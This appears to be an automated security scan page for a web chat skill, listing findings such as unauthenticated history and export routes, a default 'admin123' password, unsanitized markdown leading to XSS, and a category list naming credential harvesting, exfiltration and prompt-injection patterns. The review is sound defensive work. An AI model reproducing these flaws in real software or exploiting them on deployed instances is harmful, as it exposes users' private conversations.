ClawHub

OpenClaw Web Chat Pro

Security checks across malware telemetry and agentic risk

Overview

This appears to be a real web chat skill, but its advertised password protection does not actually protect chat history, exports, websocket access, or AI usage.

Install only if you understand this is not safely password-protected as packaged. Do not expose it to a network or public host without adding real server-side authentication, changing the default password, restricting CORS, sanitizing rendered markdown, and protecting history/export endpoints.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
Findings (8)

Intent-Code Divergence

Medium
Confidence
91% confidence
Finding
The package declares a normal web chat application, but its postinstall hook performs a filesystem side effect by copying files into ~/.openclaw/workspace/chat-web/public/. Install-time scripts execute automatically during dependency installation, so this behavior can modify a user's workspace without explicit consent and can be abused to overwrite or seed content in another application context.

Intent-Code Divergence

High
Confidence
98% confidence
Finding
The client opens a WebSocket and joins a session before authentication completes, and the socket handler immediately accepts `history` messages. That means anyone who can load the page can potentially receive chat history or session state for the generated `SESSION_ID` before passing the password gate, making the modal largely cosmetic unless the server independently enforces auth on socket join/history delivery.

Intent-Code Divergence

High
Confidence
99% confidence
Finding
The file advertises user authentication, but the implementation only exposes password check/change endpoints and does not enforce authentication on chat, history, session, model-change, or export routes. Any network-accessible client can read histories, export conversations, change session state, and invoke the backend AI service without logging in, which defeats the stated protection and materially increases unauthorized access risk.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The sample configuration includes a hardcoded weak default password (`PASSWORD=admin123`) and a permissive CORS setting (`ALLOWED_ORIGINS=*`), with no warning to change them before use. This creates a realistic risk that users will deploy the app with insecure defaults, enabling unauthorized access and expanding cross-origin attack surface.

Missing User Warnings

Medium
Confidence
99% confidence
Finding
The application inserts markdown-rendered HTML directly into the DOM using marked.parse() and innerHTML for both historical and streaming chat messages, with no visible sanitization step. If a user or model response contains raw HTML or script-capable payloads, this can lead to DOM-based XSS and account/session compromise in the browser.

Missing User Warnings

Medium
Confidence
91% confidence
Finding
The code stores the plaintext access password in `sessionStorage` and reuses it for silent re-authentication. Any script running in the origin, including one introduced via XSS or compromised third-party content, can read that password and reuse it, turning a transient UI password into retrievable client-side secret material.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The export endpoint allows downloading full conversation data by session ID and there is no authentication or authorization check protecting it. In this context, the lack of user warning is secondary; the real issue is that sensitive conversation content can be exfiltrated by any requester who knows or guesses a session ID.

Known Vulnerable Dependency: express-rate-limit==8.2.1 — 1 advisory(ies): CVE-2026-30827 (express-rate-limit: IPv4-mapped IPv6 addresses bypass per-client rate limiting o)

High
Category
Supply Chain
Confidence
96% confidence
Finding
express-rate-limit==8.2.1

VirusTotal

66/66 vendors flagged this skill as clean.

View on VirusTotal